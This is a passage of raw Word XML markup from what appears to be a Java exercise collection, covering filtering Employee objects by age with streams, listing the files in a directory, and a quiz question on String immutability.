      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6CFD1B" w14:textId="74DE2D1F" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00CE749B" w:rsidP="00D8438E">
      <w:pPr>
        <w:ind w:left="2880"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Age</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0936E4FB" w14:textId="18F45D5A" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24E2215C"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p>
    <w:p w14:paraId="12269B3E"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p>
    <w:p w14:paraId="6E1E64AD"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1F0921CF"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C62B779"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d</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32257C6B"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6322D814"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age</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC874D8"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07376CCC"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onstructor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745577EB"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DE659DA"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d</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5911ADD3"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1646693F"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ag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ge</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26405773"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D67AE26"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5D909356"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Getter methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E71388A"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getI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892C7FF"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id</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220F4E84"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043DF5E"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06DCE295"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get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2ED21E7"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3E3A8877"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6920622"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0B023C71"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get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FD578B7"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age</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B84F120"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6234126"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718737A0"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oString method for easy display</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6DF9BF"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751301B4"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to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5355730"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Employee{i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nam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ag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g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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5ED5EF"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341F14A"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D277F4"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4C509DD6"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Filt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BC3FE8C"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3909189A"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D019A52"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ample list of Employee objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318A157B"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employee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p>
    <w:p w14:paraId="1966D36C"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Joh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4</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C99181"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Jan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8</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DFCF58"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Bo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2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30220F67"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4</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li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6</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B5B13F"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Charli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2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465D74A9"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A5148C5"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6B616B15"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Filter employees with age greater than 15 using Java 8 Stream</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1355E357"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filteredEmployee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mployee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p>
    <w:p w14:paraId="60FF4ADC"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il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employe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employe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5</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE7B3FC"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llec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ollecto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List</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF0B120"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6FC7E5A6"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int filtered employees</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C20704"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Employees with age greater than 15:"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48940C14"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filteredEmployee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orEach</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p>
    <w:p w14:paraId="72A03D1F" w14:textId="77777777"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A667073" w14:textId="2118A870" w:rsidR="003A1922" w:rsidRPr="00CE4B95"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09E909A6" w14:textId="77777777" w:rsidR="003A1922" w:rsidRPr="00CE4B95" w:rsidRDefault="003A1922" w:rsidP="003A1922">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19FB2184" w14:textId="15B1CBC8" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="351" w:name="_Toc196307831"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program –</w:t>
      </w:r>
      <w:r w:rsidR="00ED3A54" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Get a list of files and directories by passing path of directory</w:t>
      </w:r>
      <w:bookmarkEnd w:id="351"/>
    </w:p>
    <w:p w14:paraId="52417E7F" w14:textId="3BCE6093" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925" w:rsidP="00EA2925">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
      <w:r w:rsidR="00041DC2" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Write a program to get a list of files and directories by passing the path of the directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359EBB29" w14:textId="0BBD422C" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D822AFF"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o</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File</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B85F83"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ArrayList</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D350D7D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275359A4"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A2AB57"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ileDirectoryList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293FC60"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1245CB90"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listFilesAndDirectories</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directoryPa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A9F213E"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e a list to hold the names of files and directories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CAF767"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fileAndDirectoryLis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List</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368206E1"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354EC51F"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e a File object for the given directory path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29ED18DE"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ile</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> director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il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irectoryPath</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DFD7FD"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316DC87F"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heck if the given path is a valid directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB183D5"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irect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xis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amp;&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> direct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Direct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41B5819"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List all files and directories within the specified directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680F8920"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ilesAndDirectorie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direct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ist</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370C8CDB"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filesAndDirectorie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7848D8A"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Add each file/directory name to the list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3336DB1F"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ite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ilesAndDirectorie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A8114FE"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fileAndDirectoryLis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tem</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250F4139"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545DF3A"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491A4C2"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ls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26AADE0"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The specified path is not a valid directory."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219D268B"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4DC76DE"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C8EA5B"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fileAndDirectoryList</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED37862"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1BDFA7A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503F00F9"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C152474"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Example directory path, replace with a valid path on your system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7224415E"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directoryPath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C:/Users/YourUsername/Documen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Example for Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73EC9B12"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5705FF58"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Get the list of files and directories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C21ABE9"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item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listFilesAndDirectorie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irectoryPath</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CCD46C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FE17B7"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int the result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE09136"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Files and Directories in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directoryPath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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2F9444"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item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orEach</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p>
    <w:p w14:paraId="4257D1C4" w14:textId="77777777"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6CB2050" w14:textId="006D7E4E" w:rsidR="00E974A2" w:rsidRPr="00CE4B95"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66D2AA65" w14:textId="77777777" w:rsidR="00E974A2" w:rsidRPr="00CE4B95" w:rsidRDefault="00E974A2" w:rsidP="00E974A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="257ED263" w14:textId="5A924056" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="352" w:name="_Toc196307832"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Program – </w:t>
      </w:r>
      <w:r w:rsidR="0093222B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Find Output</w:t>
      </w:r>
      <w:bookmarkEnd w:id="352"/>
    </w:p>
    <w:p w14:paraId="69B688C4" w14:textId="77777777" w:rsidR="00A669DF" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925" w:rsidP="00A669DF">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
      <w:r w:rsidR="00A669DF" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>What is the output of the below snippet if we print str?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA9BA12" w14:textId="4B4A6F53" w:rsidR="00A669DF" w:rsidRPr="00CE4B95" w:rsidRDefault="00A669DF" w:rsidP="00A669DF">
      <w:pPr>
        <w:ind w:left="360"/>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t>String str =”India”;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D59E62D" w14:textId="019D9C65" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00A669DF" w:rsidP="00A669DF">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pP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t>str = “Bharat”;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029CEB14" w14:textId="608040DA" w:rsidR="0093222B" w:rsidRPr="00CE4B95" w:rsidRDefault="0093222B" w:rsidP="004B6932">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1120C2A5" w14:textId="77777777" w:rsidR="0093222B" w:rsidRPr="00CE4B95" w:rsidRDefault="009322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1233738"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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t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India"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D7F368" w14:textId="77777777" w:rsidR="0093222B" w:rsidRPr="00CE4B95" w:rsidRDefault="009322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1233738"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">st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Bharat"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410A6D64" w14:textId="19AB0661" w:rsidR="0093222B" w:rsidRPr="00CE4B95" w:rsidRDefault="009322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1233738"/>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721FF8AC" w14:textId="78B12026" w:rsidR="00FB16E6" w:rsidRPr="00CE4B95" w:rsidRDefault="0093222B" w:rsidP="00BC56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2055725"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Ou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Bharat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB65D48" w14:textId="77777777" w:rsidR="000A7823" w:rsidRPr="00CE4B95" w:rsidRDefault="000A7823" w:rsidP="000A7823">
      <w:pPr>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Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3825746A" w14:textId="77777777" w:rsidR="000A7823" w:rsidRPr="00CE4B95" w:rsidRDefault="000A7823" w:rsidP="000A7823">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>In Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEFD782" w14:textId="77777777" w:rsidR="000A7823" w:rsidRPr="00CE4B95" w:rsidRDefault="000A7823">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="293"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">String is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>immutable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, meaning once a String object is created, it cannot be changed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2B5743" w14:textId="77777777" w:rsidR="000A7823" w:rsidRPr="00CE4B95" w:rsidRDefault="000A7823">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="293"/>
        </w:numPr>
        <w:rPr>
